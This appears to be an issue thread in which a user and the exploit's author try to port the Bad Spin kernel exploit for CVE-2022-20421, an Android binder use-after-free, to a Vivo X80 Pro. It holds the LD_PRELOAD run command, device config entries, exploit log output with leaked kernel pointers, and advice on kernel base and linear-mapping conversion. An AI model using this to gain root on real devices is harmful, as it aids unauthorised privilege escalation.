vivo x80 pro dimnesty edition Failed

[Ko-Hi-Dev]

PD2186:/ $ LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
Failed on dev_config_init:1341

Phone details:
Vivo x80 Pro Dimnesty Edition
[ro.build.fingerprint]: [vivo/PD2186/PD2186:12/SP1A.210812.003/compiler09052332:user/release-keys]

Patch Date:
[persist.vendor.connsys.patch.version]: [-1]
[ro.build.version.security_patch]: [2022-08-01]
[ro.vendor.build.security_patch]: [2021-12-05]

EDIT: i found out that we need to modify: dev_config.h

    /* PD2186B_A_12.0.19.3.W10 */
    .name = "Vivo x80 Pro Dimnesty Edition",
    .model = "PD2186",
    .android_version = 12,
    .android_security_patch.year = 2022,
    .android_security_patch.month = 8,
    .kernel_version = KERNEL_VERSION(5, 10, 66),
    /* .ram_offset = 0x28000000UL,*/
},

Failed on dev_config_init:1341

[Ko-Hi-Dev]

after stuck at first attempt:

adb logcat -s BADSPIN
--------- beginning of main
05-22 21:31:28.410 8063 8063 I BADSPIN : ==========================================
05-22 21:31:28.410 8063 8063 I BADSPIN : Bad Spin Exploit (CVE-2022-20421) by 0xkol
05-22 21:31:28.410 8063 8063 I BADSPIN : ==========================================
05-22 21:31:28.410 8063 8063 I BADSPIN : [x] Looking for binder_proc's inner_lock offset
05-22 21:31:28.410 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 1)
05-22 21:31:29.806 8072 8072 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:30.337 8068 8068 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:31:31.339 8063 8063 I BADSPIN : [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
05-22 21:31:31.339 8063 8063 I BADSPIN :
05-22 21:31:31.570 8488 8488 I BADSPIN : [x] Shaping physical memory
05-22 21:31:32.070 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:31:32.934 8642 8642 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:32.939 8638 8638 I BADSPIN : [x] Waiting for timer threads
05-22 21:31:33.030 8639 8639 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:31:34.015 8488 8488 I BADSPIN : ..................................................
05-22 21:31:34.015 8488 8488 I BADSPIN : [x] Failed.
05-22 21:31:34.015 8488 8488 I BADSPIN :
05-22 21:31:34.700 8941 8941 I BADSPIN : [x] Shaping physical memory
05-22 21:31:34.837 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:31:35.546 9052 9052 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:35.546 9045 9045 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:31:35.556 9044 9044 I BADSPIN : [x] Waiting for timer threads
05-22 21:31:36.574 8941 8941 I BADSPIN : ..................................................
05-22 21:31:36.574 8941 8941 I BADSPIN : [x] Failed.
05-22 21:31:36.574 8941 8941 I BADSPIN :
05-22 21:31:36.800 9237 9237 I BADSPIN : [x] Shaping physical memory
05-22 21:31:37.126 8063 8063 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:31:37.736 9357 9357 I BADSPIN : [x] Trigger use-after-free
05-22 21:31:37.741 9354 9354 I BADSPIN : [x] Waiting for timer threads
05-22 21:31:41.747 9355 9355 I BADSPIN : [x] Finish spinning at spin_lock()

05-22 21:33:34.654 11258 11258 I BADSPIN : ==========================================
05-22 21:33:34.655 11258 11258 I BADSPIN : Bad Spin Exploit (CVE-2022-20421) by 0xkol
05-22 21:33:34.655 11258 11258 I BADSPIN : ==========================================
05-22 21:33:34.655 11258 11258 I BADSPIN : [x] Looking for binder_proc's inner_lock offset
05-22 21:33:34.655 11258 11258 I BADSPIN : [x] Trigger vulnerability... (mode = 1)
05-22 21:33:36.185 11261 11261 I BADSPIN : [x] Trigger use-after-free
05-22 21:33:36.736 11259 11259 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:33:37.760 11258 11258 I BADSPIN : [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
05-22 21:33:37.760 11258 11258 I BADSPIN :
05-22 21:33:37.865 11323 11323 I BADSPIN : [x] Shaping physical memory
05-22 21:33:38.218 11258 11258 I BADSPIN : [x] Trigger vulnerability... (mode = 3)
05-22 21:33:38.929 11383 11383 I BADSPIN : [x] Trigger use-after-free
05-22 21:33:38.941 11380 11380 I BADSPIN : [x] Waiting for timer threads
05-22 21:33:40.951 11381 11381 I BADSPIN : [x] Finish spinning at spin_lock()
05-22 21:33:42.024 11323 11323 I BADSPIN : ...............................................*..
05-22 21:33:42.087 11323 11323 I BADSPIN : [x] Trying to escalate...
05-22 21:33:42.178 11323 11323 I BADSPIN : [x] Found corrupted ptmx and pipe.
05-22 21:33:42.181 11258 11258 I BADSPIN : [x] Leaking pipe buffer...
05-22 21:33:43.283 11258 11258 I BADSPIN : [x] Leaked pipe buffer oprerations: ffffffe827200068
05-22 21:33:43.283 11258 11258 I BADSPIN : [x] Leaked pipe buffer page : ffffffff0b1c2580

[0xkol]

It looks like the second attempt succeeded (shaping + vulnerability + found corrupted pipe) which is good news. For the rest of the exploit to work you will probably need to do some adjustments. In particular: the function to_lm(), which converts a kernel pointer to the linear mapping, will need to be modified. (If the vivo device behaves like the pixel 6 (have no physical kaslr) then the change should be trivial.)

Also, the way the kernel base is found might need some modification. (Currently the kernel base is found by scanning for kallsyms for pixel 6.)

Pro tip: consult /proc/iomem.

[Ko-Hi-Dev]

yeah the main issue we can't use /cat/proc/iomem only returns permission denied

neither is source code available for the device

I'm not 100% sure if we do us kaslr either

[0xkol]

I see. Try assuming it's like the pixel 6 in the to_lm() and other places (look for is_device("Google Pixel 6")), might just work out of the box.

[Ko-Hi-Dev]

I see. Try assuming it's like the pixel 6 in the to_lm() and other places (look for is_device("Google Pixel 6")), might just work out of the box.

i'll give you a output of log with verbose attached (since last two wasn't with verbose enabled)

log.txt

it seems like we do also get monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) at the beginning then it seems to disappear.

log1.txt

[0xkol]

When it found the corrupted pipe it should work deterministically from this point onwards. You probably need to change the conversion to the linear mapping as I said earlier.

[Ko-Hi-Dev]

@0xkol
I'm sorry but can you elaborate pointer to the linear mapping

I'm not really sure what you mean by it.

If it cannot be done from cat /proc/iomem is there any other way too get it,?

Can we get it from kallsyms?

[0xkol]

Hi, please try the new version with the function pointers kimg_to_lm and find_kbase. If you are not sure, you might just set them to the same values as for the Pixel 6.

[Ko-Hi-Dev]

Hi, please try the new version with the function pointers kimg_to_lm and find_kbase. If you are not sure, you might just set them to the same values as for the Pixel 6.

Yeah it still crashes. Tries to trigger the exploit and dies, I'm unsure if it can be due to vivo actually have security measures regarding root. Can it be the issue?

[0xkol]

Sorry I don't own such a device so there's nothing more I can do remotely....

[Ko-Hi-Dev]

Sorry I don't own such a device so there's nothing more I can do remotely....

Well, at least you have done your part trying to help, I'll try look into it when I have time.

I have another phone i can try this on.

I've heard vivo do block root trough kernel especially su command but who knows,

I might try to log while running the exploit and see if i can get any more info.

Thanks for taking your time 🙏